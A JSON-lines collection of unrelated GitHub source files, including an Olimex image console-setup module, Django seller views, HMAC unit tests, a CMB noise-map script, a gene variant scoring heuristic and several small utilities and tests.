{"seq_id":"9805630348","text":"import olimage.environment as env\n\nfrom olimage.core.io import Console\nfrom olimage.core.utils import Utils\n\nfrom .base import SetupAbstract\n\n\nclass SetupConsole(SetupAbstract):\n\n def setup(self, keymap: str, layout: str):\n\n # Configure console\n with Console(\"Generating console configuration\"):\n Utils.shell.chroot(\n 'bash -c \'\\\n echo \"console-setup console-setup/charmap47 select UTF-8\" | debconf-set-selections -v; \\\n echo \"console-setup console-setup/codeset47 select Guess optimal character set\\\" | debconf-set-selections -v; \\\n echo \"console-setup console-setup/fontface47 select Do not change the boot/kernel font\" | debconf-set-selections -v\\\n \''\n )\n\n # Configure keyboard\n with Console(\"Generating keyboard configuration: \'{}\'\".format(keymap)):\n Utils.shell.chroot(\n 'bash -c \'\\\n echo \"keyboard-configuration keyboard-configuration/altgr select The default for the keyboard layout\" | debconf-set-selections -v; \\\n echo \"keyboard-configuration keyboard-configuration/model select Generic 105-key (Intl) PC\" | debconf-set-selections -v; \\\n echo \"keyboard-configuration keyboard-configuration/xkb-keymap select {}\" | debconf-set-selections -v; \\\n echo \"keyboard-configuration keyboard-configuration/compose\tselect No compose key\" | debconf-set-selections -v; \\\n echo \"keyboard-configuration keyboard-configuration/ctrl_alt_bksp boolean true\" | debconf-set-selections -v; \\\n echo \"keyboard-configuration keyboard-configuration/variant select {}\" | debconf-set-selections -v\\\n \''.format(keymap, layout)\n )\n\n # 
Install package\n with Console(\"Installing packages\"):\n Utils.shell.chroot('apt-get install -y {}'.format(' '.join(self.packages)))\n\n # Run configuration\n with Console(\"Running setup\"):\n Utils.install('/etc/default/console-setup')\n Utils.shell.chroot('setupcon --force --save-only -v')\n","repo_name":"OLIMEX/olimage","sub_path":"olimage/core/setup/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"30743759045","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden\nfrom django.core.urlresolvers import reverse\nfrom django.core.exceptions import PermissionDenied\nfrom django.contrib.auth.decorators import login_required\nimport datetime\nfrom django.utils import timezone\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom helper import random_alphanumeric as ran\nfrom django.core.mail import send_mail, EmailMessage\nfrom easy_ecom import settings_sensitive\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import StoreSelectForm, NewBookForm, NewBookISBNCheckForm, ItemForm, NewBookAuthorForm, \\\n NewBookPublisherForm, InventoryForm, NewAuthorForm, NewPublisherForm\nfrom accounts.forms import AddressForm\nfrom store.models import BookStore, Item, Author, Publisher, Inventory\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom helper import custom_http\n\n# Create your views here.\n@login_required()\ndef dashboardView(request):\n return render(request, 'sell/dashboard.html', {})\n\n@login_required()\ndef newView(request):\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = StoreSelectForm(request.POST)\n # check whether it's valid:\n if form.is_valid():\n # process the data in form.cleaned_data as required\n # ...\n # redirect to a new URL:\n print(request.POST.get('store_names'))\n if request.POST.get('store_names') == 'Books':\n return HttpResponseRedirect(reverse('sell:newBookCheck'))\n\n return HttpResponseRedirect(reverse('sell:new'))\n\n # if a GET (or any other method) we'll create a blank form\n else:\n form = StoreSelectForm()\n\n return render(request, \"sell/new.html\", {'storeForm': form})\n\n@login_required()\ndef editView(request):\n return HttpResponse(\"seller editView\")\n\n@login_required()\ndef addNewBook(request, isbn):\n store_name = \"Books\"\n try:\n if len(str(int(isbn))) == 13: #double checking isbn format, since a direct request to this url could break our desired outcome.\n BookStore.objects.get(pk=isbn)\n else:\n raise PermissionDenied\n except ObjectDoesNotExist:\n pass\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n bookForm = NewBookForm(request.POST)\n itemForm = ItemForm(request.POST, store=store_name)\n authorForm = NewBookAuthorForm(request.POST)\n publisherForm = NewBookPublisherForm(request.POST)\n # check whether it's valid:\n if bookForm.is_valid() and itemForm.is_valid() and authorForm.is_valid() and publisherForm.is_valid():\n # process the data in form.cleaned_data as required\n # ...\n # redirect to a new URL:\n\n title = itemForm.cleaned_data['title']\n description = 
itemForm.cleaned_data['description']\n shipping_product_dimension_height = itemForm.cleaned_data['shipping_product_dimension_height']\n shipping_product_dimension_width = itemForm.cleaned_data['shipping_product_dimension_width']\n shipping_product_dimension_length = itemForm.cleaned_data['shipping_product_dimension_length']\n shipping_product_dimension_units = itemForm.cleaned_data['shipping_product_dimension_units']\n shipping_product_weight = itemForm.cleaned_data['shipping_product_weight']\n shipping_product_weight_units = itemForm.cleaned_data['shipping_product_weight_units']\n category = itemForm.cleaned_data['category']\n item = Item.objects.create(title= title, description= description, shipping_product_dimension_height= shipping_product_dimension_height,\n shipping_product_dimension_width= shipping_product_dimension_width, shipping_product_dimension_length= shipping_product_dimension_length,\n shipping_product_dimension_units= shipping_product_dimension_units, shipping_product_weight= shipping_product_weight,\n shipping_product_weight_units= shipping_product_weight_units)\n item.category.add(*category)\n\n isbn_10 = bookForm.cleaned_data['isbn_10']\n isbn_13 = bookForm.cleaned_data['isbn_13']\n language = bookForm.cleaned_data['language']\n publisher = publisherForm.cleaned_data['name']\n\n book = BookStore.objects.create(isbn_10=isbn_10, isbn_13=isbn_13, language=language,\n item=item, publisher= publisher)\n authors = authorForm.cleaned_data['name']\n book.authors.add(*authors)\n\n return HttpResponseRedirect(reverse('sell:newInventory') + '?store_name=' + store_name + '&isbn_13=' + isbn_13)\n # if a GET (or any other method) we'll create a blank form\n else:\n bookForm = NewBookForm()\n itemForm = ItemForm(store=\"Books\")\n authorForm = NewBookAuthorForm()\n publisherForm = NewBookPublisherForm()\n return render(request, \"sell/new_book.html\",\n {'bookForm' : bookForm, 'itemForm': itemForm, 'authorForm': authorForm, 'publisherForm': publisherForm,\n 'isbn': isbn})\n\nclass StoreNotFoundException(Exception):\n pass\n\n@login_required()\ndef newInventory(request):\n try: #Proceed only if object exists for that store.\n store_name= request.GET['store_name']\n #retrieve item object as well\n if store_name == \"Books\":\n isbn_13 = request.GET['isbn_13']\n book = BookStore.objects.get(isbn_13=isbn_13)\n item = book.item\n else:\n raise StoreNotFoundException\n if len(Inventory.objects.filter(item = item, seller=request.user)) != 0:\n return render(request, 'sell/new_inventory_present_already.html', {})\n except (ObjectDoesNotExist, StoreNotFoundException) as e:\n print(e)\n raise PermissionDenied\n\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n inventoryForm = InventoryForm(request.POST, user= request.user.userextended)\n # check whether it's valid:\n if inventoryForm.is_valid():\n # process the data in form.cleaned_data as required\n # ...\n price = inventoryForm.cleaned_data['price']\n # currency--> # make a dict to map country and currency\n total_available_stock = inventoryForm.cleaned_data['total_available_stock']\n address = inventoryForm.cleaned_data['address']\n available_countries = inventoryForm.cleaned_data['available_countries']\n domestic_shipping_company = inventoryForm.cleaned_data['domestic_shipping_company']\n domestic_shipping_cost = inventoryForm.cleaned_data['domestic_shipping_cost']\n free_domestic_shipping = 
inventoryForm.cleaned_data['free_domestic_shipping']\n international_shipping_company = inventoryForm.cleaned_data['international_shipping_company']\n international_shipping_cost = inventoryForm.cleaned_data['international_shipping_cost']\n free_international_shipping = inventoryForm.cleaned_data['free_international_shipping']\n local_pick_up_accepted = inventoryForm.cleaned_data['local_pick_up_accepted']\n dispatch_max_time = inventoryForm.cleaned_data['dispatch_max_time']\n return_accepted = inventoryForm.cleaned_data['return_accepted']\n listing_end_datetime = inventoryForm.cleaned_data['listing_end_datetime']\n condition = inventoryForm.cleaned_data['condition']\n\n Inventory.objects.create(item=item, seller=request.user, price=price, total_available_stock= total_available_stock,\n item_location= address, available_countries= available_countries,\n domestic_shipping_company= domestic_shipping_company, domestic_shipping_cost= domestic_shipping_cost,\n free_domestic_shipping= free_domestic_shipping, international_shipping_company=international_shipping_company,\n free_international_shipping=free_international_shipping, local_pick_up_accepted= local_pick_up_accepted,\n dispatch_max_time= dispatch_max_time, return_accepted= return_accepted,\n listing_end_datetime= listing_end_datetime, condition= condition, international_shipping_cost=international_shipping_cost,\n\n )\n\n # redirect to item page:\n return render(request, 'sell/new_inventory_added.html', {})\n\n # if a GET (or any other method) we'll create a blank form\n else:\n inventoryForm = InventoryForm(user= request.user.userextended)\n return render(request, 'sell/new_inventory.html', {'inventoryForm': inventoryForm, 'get_params': custom_http.get_from_request_GET(request)})\n\n@login_required()\ndef addNewBookPKCheck(request):\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = NewBookISBNCheckForm(request.POST)\n # check whether it's valid:\n if form.is_valid():\n # process the data in form.cleaned_data as required\n # ...\n # redirect to a new URL:\n isbn = form.cleaned_data['isbn']\n try:\n book = BookStore.objects.get(pk=isbn)\n #if found, redirect him to add as a seller in the listing\n get = '?store=Books&id={}'.format(book.pk)\n return HttpResponseRedirect(reverse('sell:newInventory') + get)\n # print(\"add him to the inventory\")\n except Exception:\n #if not found, create a new book\n return HttpResponseRedirect(reverse('sell:newBook', kwargs= {'isbn' : isbn}))\n\n # if a GET (or any other method) we'll create a blank form\n else:\n form = NewBookISBNCheckForm()\n\n return render(request, \"sell/new_book_isbn_check.html\", {'isbnCheckForm': form})\n\n@login_required()\ndef newAuthor(request):\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = NewAuthorForm(request.POST)\n # check whether it's valid:\n if form.is_valid():\n # process the data in form.cleaned_data as required\n # ...\n # redirect to a new URL:\n name = form.cleaned_data['name']\n Author.objects.create(name = name, created_by = request.user)\n return render(request, 'sell/new_author_added.html', {'form': form})\n\n # if a GET (or any other method) we'll create a blank form\n else:\n form = NewAuthorForm()\n\n return render(request, 'sell/new_author.html', {'form': form})\n\n@login_required()\ndef newPublisher(request):\n # if this 
is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = NewPublisherForm(request.POST)\n # check whether it's valid:\n if form.is_valid():\n # process the data in form.cleaned_data as required\n # ...\n # redirect to a new URL:\n name = form.cleaned_data['name']\n Publisher.objects.create(name = name, created_by = request.user)\n return render(request, 'sell/new_publisher_added.html', {'form': form})\n\n # if a GET (or any other method) we'll create a blank form\n else:\n form = NewPublisherForm()\n\n return render(request, 'sell/new_publisher.html', {'form': form})","repo_name":"bharathramh92/easy-ecom","sub_path":"sell/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14434767867","text":"import unittest\nimport hashlib\nimport hmac\nimport base64\n\n\nclass TestHMACEncryption(unittest.TestCase):\n def setUp(self):\n super().setUp()\n self.API_SECRET_KEY = \"API_SECRET_CLIENT1\"\n self.digest_mode = hashlib.sha256\n\n self.payload = '''\n{\n \"event\": \"SERVER_UPDATE\",\n \"updates\": [\n {\n \"item\": \"gadgets\",\n \"action\": \"add\",\n \"quantity\": 20\n },\n {\n \"item\": \"widgets\",\n \"action\": \"remove\",\n \"quantity\": 10\n }\n ]\n}'''\n\n def test_hmac_encryption(self):\n # creating a cryptographic hash of the webhook payload\n # This unique signature will be sent in the header\n\n hmac_result = hmac.new(\n self.API_SECRET_KEY.encode('utf-8'),\n self.payload.encode('utf-8'),\n digestmod=hashlib.sha256)\n\n hmac_digest = hmac_result.digest()\n\n computed_mac = base64.b64encode(hmac_digest)\n expected_result = '9oJnkH8gr3l7UXYlGf3XYEyXKvpf6z0F6w1fJ4aYh5c='.encode('utf-8')\n #print(computed_mac) # 9oJnkH8gr3l7UXYlGf3XYEyXKvpf6z0F6w1fJ4aYh5c=\n result = hmac.compare_digest(computed_mac, expected_result)\n self.assertEqual(computed_mac, expected_result)\n self.assertTrue(result)\n\n def test_hmac_simple(self):\n simple_payload = '{\"event\": \"SERVER_UPDATE\"}'\n\n hmac_result = hmac.new(\n self.API_SECRET_KEY.encode('utf-8'),\n simple_payload.encode('utf-8'),\n digestmod=hashlib.sha256)\n\n hmac_digest = hmac_result.digest()\n\n computed_mac = base64.b64encode(hmac_digest)\n expected_result = 'SgS9OYxlwwM75ttkEJSrMJvVpoXTLrHkWQAJrgFx7LY='.encode('utf-8')\n\n result = hmac.compare_digest(computed_mac, expected_result)\n self.assertEqual(computed_mac, expected_result)\n self.assertTrue(result)","repo_name":"RobertaBtt/adaptive-python-service","sub_path":"tests/utilities/test_hmac_encryption.py","file_name":"test_hmac_encryption.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26330730745","text":"import healpy as hp\nimport numpy as np\n\n# Add SPT noise, chi-by-eye to Henning SPT-500deg^2 paper N_l and\n# functional form in http://users.physics.harvard.edu/~buza/20161220_chkS4/\n\n#sigmap = 9.0 # uK-arcmin, SPT\nsigmap = 1.2 # uK-arcmin, CMB-S4\n\nlknee = 250.\nlexp = -1.8\n\nl = np.arange(8000)*1.0\nNl = 4*np.pi / (41253.*60**2) * (1+(l/lknee)**(lexp)) * sigmap**2\nNl[0] = 0\n\n# Get noise realization\nNside = 1024\n\nfor rlz in range(26,100):\n\n print(rlz)\n\n hmapTn = hp.synfast(Nl, Nside, new=True, verbose=False)\n hmapQn = hp.synfast(Nl, Nside, new=True, verbose=False)\n hmapUn = hp.synfast(Nl, Nside, new=True, verbose=False)\n\n 
hp.write_map('input_maps/S4_noise_map_r{:04d}.fits'.format(rlz),[hmapTn,hmapQn,hmapUn])\n\n\n","repo_name":"csheehy/cpmdeproj","sub_path":"scripts/maketempnoisemap.py","file_name":"maketempnoisemap.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10285130828","text":"#!/usr/bin/env python\ndef primes():\n candidates = [2]\n p = 3\n\n while p <= 2000000:\n prime = True\n for candidate in candidates:\n if p % candidate == 0:\n prime = False\n break\n\n if prime:\n candidates.append(p)\n\n p += 2\n\n return candidates\n\nprint(sum(primes()))\n","repo_name":"chiwanpark/project-euler","sub_path":"src/prob00010.py","file_name":"prob00010.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30547596175","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.utils.timezone\nimport cms.models.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cms', '0016_auto_20160608_1535'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='JobOffer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('active', models.BooleanField(default=False, help_text='Zaznacz jezeli chcesz opublikowac ogloszenie', verbose_name=b'Aktywne Tak/Nie')),\n ('pub_date', models.DateField(default=django.utils.timezone.now, verbose_name=b'data publikacji')),\n ('position_pl', models.CharField(max_length=200, verbose_name=b'stanowisko PL')),\n ('position_en', models.CharField(max_length=200, verbose_name=b'stanowisko EN')),\n ('city', models.CharField(max_length=200, verbose_name=b'Miasto')),\n ('slug', models.SlugField(default=b'')),\n ('content_en', cms.models.fields.PlaceholderField(related_name='job_offer_EN', slotname=b'content_en', editable=False, to='cms.Placeholder', null=True)),\n ('content_pl', cms.models.fields.PlaceholderField(related_name='job_offer_PL', slotname=b'content_pl', editable=False, to='cms.Placeholder', null=True)),\n ],\n ),\n ]\n","repo_name":"rapapor/djcms","sub_path":"apps/job/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11372132931","text":"from app.enhancer.data_miner.database.utility import DatabaseUtility\n\nblacklist_inputs = [None,\"\"]\nclass DatabaseHandler:\n def __init__(self):\n self._db_util = DatabaseUtility()\n for k,v in self._db_util.db_mapping_calls.items():\n setattr(DatabaseHandler, k, k)\n \n def get(self,identity,timeout=10,db_name=None):\n if identity in blacklist_inputs:\n return None\n if str.isdigit(identity):\n return None\n if db_name is not None:\n dbs = [db_name]\n else:\n dbs = self._get_potential_db_names(identity)\n\n for db in dbs:\n record = self._db_util.get(identity,db_name=db,timeout=timeout)\n if record is not None:\n return record\n return None\n\n def count(self,query):\n for db in self._db_util.db_mapping_calls.keys():\n yield self._db_util.count(query,db)\n\n def query(self,query,lazy=False):\n if lazy:\n for db in self._db_util.db_mapping_calls.keys():\n res = self._db_util.query(query,db)\n if len(res) > 0:\n yield res\n return\n else:\n for db in self._db_util.db_mapping_calls.keys():\n yield self._db_util.query(query,db)\n\n 
def is_record(self,identity):\n for db in self._db_util.db_mapping_calls.keys():\n if self._db_util.is_record(identity,db):\n return True\n return False\n\n def sequence_search(self,seqeunce,similarity=None,db_name=None):\n if db_name is not None:\n dbs = [db_name]\n else:\n dbs = self._db_util.db_mapping_calls.keys()\n for db in dbs:\n s = self._db_util.sequence(seqeunce,db,similarity=similarity)\n if s is not None and len(s) > 0:\n return s\n return None\n\n def get_uri(self,name):\n for db in self._db_util.db_mapping_calls.keys():\n s = self._db_util.get_uri(name,db)\n if s != []:\n return s[0]\n return None\n \n def find_uses(self):\n pass\n\n def get_metadata_identifiers(self):\n return self._db_util.get_metadata_identifiers()\n\n def download_igem_parts(self,out_fn):\n return self._db_util.db_mapping_calls[\"synbiohub\"].download_igem_parts(out_fn)\n \n def get_vpr_data(self,out_fn):\n return self._db_util.db_mapping_calls[\"synbiohub\"].get_vpr_data(out_fn)\n \n def _get_potential_db_names(self,identity):\n potential_codes = self._db_util.get_potential_db_names(identity)\n if len(potential_codes) == 0:\n return list(self._db_util.db_mapping_calls.keys())\n return potential_codes\n","repo_name":"intbio-ncl/genet2","sub_path":"app/enhancer/data_miner/database/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31539434239","text":"def resolve():\n N = int(input())\n D = [int(e) for e in input().split()]\n\n ans = 0\n for month, days in enumerate(D, 1):\n for d in range(1, days + 1):\n ss = str(month) + str(d)\n for s in ss:\n if s != ss[0]: break\n else:\n ans += 1\n\n print(ans)\n\n# resolve()\n# exit()\n\nimport sys\nfrom io import StringIO\nimport unittest\n\n\nclass TestClass(unittest.TestCase):\n def assertIO(self, input, output):\n stdout, stdin = sys.stdout, sys.stdin\n sys.stdout, sys.stdin = StringIO(), StringIO(input)\n resolve()\n sys.stdout.seek(0)\n out = sys.stdout.read()[:-1]\n sys.stdout, sys.stdin = stdout, stdin\n self.assertEqual(out, output)\n\n def test_入力例_1(self):\n input = \"\"\"12\n31 29 31 30 31 30 31 31 30 31 30 31\"\"\"\n output = \"\"\"13\"\"\"\n self.assertIO(input, output)\n\n def test_入力例_2(self):\n input = \"\"\"10\n10 1 2 3 4 5 6 7 8 100\"\"\"\n output = \"\"\"1\"\"\"\n self.assertIO(input, output)\n\n def test_入力例_3(self):\n input = \"\"\"30\n73 8 55 26 97 48 37 47 35 55 5 17 62 2 60 23 99 73 34 75 7 46 82 84 29 41 32 31 52 32\"\"\"\n output = \"\"\"15\"\"\"\n self.assertIO(input, output)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"koba925/alds","sub_path":"atcoder/ABC328/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"467529199","text":"# coding: utf8\nfrom __future__ import unicode_literals, absolute_import, division, print_function\n\nimport pytest\nfrom hamcrest import assert_that, has_entries, contains_inanyorder, has_properties\n\nfrom common.models.geo import Station2Settlement, StationMajority\nfrom common.models.schedule import RTStation\nfrom common.tester.factories import create_station, create_settlement, create_thread\nfrom common.utils.settlement import fetch_station_settlement_ids, fill_best_rts_for_settlement, \\\n fetch_station_settlement_ids_with_none\n\n\n@pytest.mark.dbuser\ndef test_fetch_station_settlement_ids():\n station = 
create_station(settlement=create_settlement())\n settlement = create_settlement()\n Station2Settlement.objects.create(station=station, settlement=settlement)\n station_without_settlement = create_station()\n\n station_settlement_ids = fetch_station_settlement_ids()\n\n assert_that(station_settlement_ids, has_entries({\n station.id: contains_inanyorder(station.settlement.id, settlement.id),\n }))\n assert station_without_settlement not in station_settlement_ids\n\n\n@pytest.mark.dbuser\ndef test_fetch_station_settlement_ids_with_none():\n station = create_station(settlement=create_settlement())\n settlement = create_settlement()\n Station2Settlement.objects.create(station=station, settlement=settlement)\n station_without_settlement = create_station()\n\n station_settlement_ids = fetch_station_settlement_ids_with_none()\n\n assert_that(station_settlement_ids, has_entries({\n station.id: contains_inanyorder(station.settlement.id, settlement.id),\n station_without_settlement.id: contains_inanyorder(None),\n }))\n\n\n@pytest.mark.dbuser\ndef test_fill_best_rts_for_settlement():\n settlement = create_settlement()\n settlement2 = create_settlement()\n stations = [create_station(majority=StationMajority.IN_TABLO_ID),\n create_station(settlement=settlement, majority=StationMajority.IN_TABLO_ID),\n create_station(settlement=settlement, majority=StationMajority.MAIN_IN_CITY_ID),\n create_station(settlement=settlement, majority=StationMajority.IN_TABLO_ID),\n create_station(settlement=settlement, majority=StationMajority.MAIN_IN_CITY_ID),\n create_station(majority=StationMajority.IN_TABLO_ID),\n create_station(settlement=settlement, majority=StationMajority.IN_TABLO_ID),\n create_station(settlement=settlement2, majority=StationMajority.IN_TABLO_ID)]\n settlement3 = create_settlement()\n Station2Settlement.objects.create(station=stations[-1], settlement=settlement3)\n thread = create_thread(\n schedule_v1=[\n [None, 0, stations[0]],\n [10, 20, stations[1]],\n [30, 40, stations[2]],\n [50, 60, stations[3]],\n [70, 80, stations[4]],\n [90, 100, stations[5]],\n [110, 120, stations[6]],\n [130, None, stations[7]],\n ]\n )\n rts_from, rts_to = fill_best_rts_for_settlement(RTStation.objects.filter(thread=thread))\n assert_that(rts_from, has_entries({\n settlement.id: has_properties(id=RTStation.objects.get(thread=thread, station=stations[4]).id),\n }))\n assert_that(rts_to, has_entries({\n settlement.id: has_properties(id=RTStation.objects.get(thread=thread, station=stations[2]).id),\n settlement2.id: has_properties(id=RTStation.objects.get(thread=thread, station=stations[-1]).id),\n settlement3.id: has_properties(id=RTStation.objects.get(thread=thread, station=stations[-1]).id),\n }))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/utils/test_settlement.py","file_name":"test_settlement.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7269318027","text":"import re\nimport itertools\nfrom collections import defaultdict\n\ndef scores_as_table(entry_list, top_n = 20):\n entry_list.sort(key = lambda x: x['composite_score'], reverse = True)\n headers = [i for i in itertools.chain.from_iterable([['title'], ['composite_score'], ['snp_burden'], \n entry_list[0]['blast_scores'].keys(), [\"coverage_score\"]])]\n lines = [ [ [s['title']], [s['composite_score']], [s['snp_burden']], \n s['blast_scores'].values(), [s['coverage_score']]] for s in entry_list[:top_n] ]\n top_entries = 
[headers]\n for line in lines:\n entry = [i for i in itertools.chain.from_iterable(line)]\n top_entries.append(entry)\n return top_entries\n\ndef write_table(entry_list, file_name):\n import csv\n scores_table = scores_as_table(entry_list)\n with open(file_name, 'w') as f:\n w = csv.writer(f, delimiter ='\\t')\n w.writerows(scores_table)\n\ndef test_heuristic(annotation_report, file_name, blast_max = 20, snp_max = 20, coverage_max = 20,\n var_score_dict=None, blast_value = 2, coverage_value = 1):\n annotation_report.score_all_entries(blast_max, snp_max, coverage_max,\n var_score_dict, blast_value, coverage_value)\n sdata = sorted([g for g in annotation_report], key=lambda x: x['composite_score'], reverse=True)\n write_table(sdata, \"test_heuristic-snp-%d-blast-%d-%d-cov-%d-%d.tsv\" % (snp_max, blast_value, blast_max, coverage_value, coverage_max))\n\n\n\n\n# if missense moderate, 1, if high, 2, based on snpEff? let frame_shift be just high (2)?\n# Assume UNKNOWN is missense\n# Add a limit on how many mutations can contribute?\n# Split score into variant_score (\"snp_burden\") and blast hits (\"drug burden\")\n# Normalize snp_burden by sequence size\n# Add tapering for redundant blast hits.\n# split drugbank and card # done\n# Max all by 20 and don't normalize by gene size?\n# Composite score gets extra multiplier?\n# Add weight by allele frequency?\ndef score_heuristic_cap(entry, blast_max = 20, snp_max = 20, coverage_max = 20,\n var_score_dict=None, blast_value = 2, coverage_value = 1, \n ignore_filter_set = None):\n if ignore_filter_set is None:\n ignore_filter_set = set()\n else:\n ignore_filter_set = set(ignore_filter_set)\n if var_score_dict is None:\n var_score_dict = {\"LOW\": 0.1, \"UNKNOWN\": 1,\"MODERATE\": 1, \"MODIFIER\": 1, \"HIGH\": 2}\n\n variant_score = 0\n for variant in entry[\"variants\"]:\n if len(set(variant[\"filters\"]) - ignore_filter_set) == 0:\n variant_score += var_score_dict[variant[\"eff\"].get(\"impact\", \"UNKNOWN\")]\n\n entry['snp_burden'] = variant_score\n composite = max(min(variant_score, snp_max), 1)\n\n # If no variants were accepted, then this gene shouldn't be considered based on its\n # overall composite score. 
Other scores are calculated, but the composite will be 0\n if variant_score == 0:\n composite = 0\n\n blast_db_scores = defaultdict(int)\n current_db = \"UNKNOWN\"\n for blast_db, blast_hits in entry['blast_hits'].items():\n if re.search(\"drugbank\", blast_db):\n current_db = 'drugbank'\n elif re.search(\"comprehensive_antibiotic\", blast_db):\n current_db = \"card\"\n else:\n current_db = \"UNKNOWN\"\n for hit in blast_hits:\n blast_db_scores[current_db + \"_score\"] += 1\n\n entry['blast_scores'] = blast_db_scores\n \n blast_total = 0\n for blast_db, score in blast_db_scores.items():\n blast_total += min(score * blast_value, blast_max)\n\n composite *= max(blast_total, 1)\n\n coverage_score = 0\n for region in entry['uncovered_regions']:\n coverage_score += coverage_value\n\n entry['coverage_score'] = coverage_score\n\n composite *= max(min(coverage_score, coverage_max), 1)\n\n entry['composite_score'] = composite\n return entry\n\n\n\ndef overfit_score_heuristic(entry, snp_score = .1, missense_score = 2, frame_shift_score = 2/3.0, min_quality = 20, \\\n blast_hit_score = 2, multi_drug_bonus = 2, uncov_region_score = 2):\n variant_score = 1\n seq_len = float(entry['end'] - entry['start'])\n for variant in entry[\"variants\"]:\n if variant['call_quality'] < min_quality:\n continue\n if variant[\"eff\"][\"type\"] in [\"UNKNOWN\", \"SYNONYMOUS_CODING\", \"INTERGENIC\"]:\n variant_score += snp_score\n\n elif variant[\"eff\"][\"type\"] in [\"NON_SYNONYMOUS_CODING\", \"NON_SYNONYMOUS_START\", \\\n \"SYNONYMOUS_STOP\", \"NON_SYNONYMOUS_STOP\"]:\n variant_score += missense_score\n\n elif variant[\"eff\"][\"type\"] in [\"STOP_GAINED\", \"STOP_LOST\", \"START_LOST\", \"RARE_AMINO_ACID\"]:\n variant_score += seq_len/3.0 * min(seq_len / 2000, 1)\n\n elif variant[\"eff\"][\"type\"] in [\"FRAME_SHIFT\", \"SPLICE_SITE_ACCEPTOR\", \"SPLICE_SITE_DONOR\"]:\n start_point = variant['start'] - entry['start']\n percent_shift = (start_point / seq_len)\n # The earlier the shift occurs, the greater the score multiplier, \n # but penalize short sequences ( < 1000 bp) \n score = (frame_shift_score / percent_shift) * min(seq_len / 2000, 1)\n variant_score += score\n #variant_score += frame_shift_score\n else:\n print(\"Variant Effect Not Recognized: %s\" % variant[\"eff\"][\"type\"])\n \n blast_score = 1\n for blast_db, blast_hits in entry['blast_hits'].items():\n for hit in blast_hits:\n blast_score += blast_hit_score\n if re.search(r'multidrug', hit['hit_def'], re.IGNORECASE):\n blast_score += multi_drug_bonus\n\n coverage_score = 1\n for region in entry[\"uncovered_regions\"]:\n # if(entry['mean_coverage'] == 0):\n # uncov_region_score * --\n coverage_score += uncov_region_score\n\n entry[\"score\"] = variant_score * blast_score * coverage_score\n return entry","repo_name":"PathoScope/PathoVar","sub_path":"pathovar/snp_annotation/scoring_heuristic.py","file_name":"scoring_heuristic.py","file_ext":"py","file_size_in_byte":5952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15824338481","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\nfrom . 
import views\n\napp_name = 'top'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^signup/', views.signup, name='signup'),\n url(r'^policy/', views.policy, name='policy'),\n url(r'^privacy/', views.privacy, name='privacy'),\n]\n","repo_name":"yasunt/famo","sub_path":"top/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
